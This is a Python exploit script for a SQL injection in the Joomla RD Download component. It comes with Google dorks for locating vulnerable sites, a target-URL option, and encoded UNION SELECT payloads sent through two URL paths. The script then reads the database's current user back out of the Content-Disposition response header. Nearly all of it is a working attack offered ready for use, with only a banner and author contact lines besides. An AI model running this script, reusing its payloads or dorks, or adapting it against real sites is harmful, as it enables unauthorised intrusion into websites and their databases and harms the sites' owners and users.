|
#!/usr/bin/python
#
# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown
#
# Exploit discovered and written by Claudio Viviani
#
# Dork google 1: inurl:index.php?option=com_rd_download
# Dork google 2: inurl:/component/rd_download/
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
banner = """
_______ __
| _ .-----.-----.--------| .---.-.
|___| | _ | _ | | | _ |
|. | |_____|_____|__|__|__|__|___._|
|: 1 |
|::.. . |
`-------'
_______ ______ ______ __ __
| _ | _ \ | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
|. l |. | \ |. | \| _ | | | | | | _ | _ | _ |
|. _ |. | \ |. | |_____|________|__|__|__|_____|___._|_____|
|: | |: 1 / |: 1 /
|::.|:. |::.. . / |::.. . /
`--- ---`------' `------'
J00ml4 RD D0wnl04d Sql1nj3ct10n
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
host = checkurl(options.target)
evilurl = { '/component/rd_download/?view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/component/rd_download/?view=download&task=dl&id=[SQLi]',
'/index.php?option=com_rd_download&view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]' }
print(banner)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
for exploiting, dork in evilurl.iteritems():
print "[*] Trying to connect to: "+host+dork
try:
req = urllib2.Request(host+exploiting, None, headers)
response = urllib2.urlopen(req)
response_header = response.info().getheader('Content-Disposition')
if response_header:
if "h0m3l4b1t" in response_header:
print "[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response_header).group(1)
print "[*] Username: "+str(current_user)
sys.exit(0)
else:
print "[X] Not vulnerable :("
else:
print "[X] Not vulnerable :("
except urllib2.HTTPError as e:
print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e.code))
sys.exit(1)
|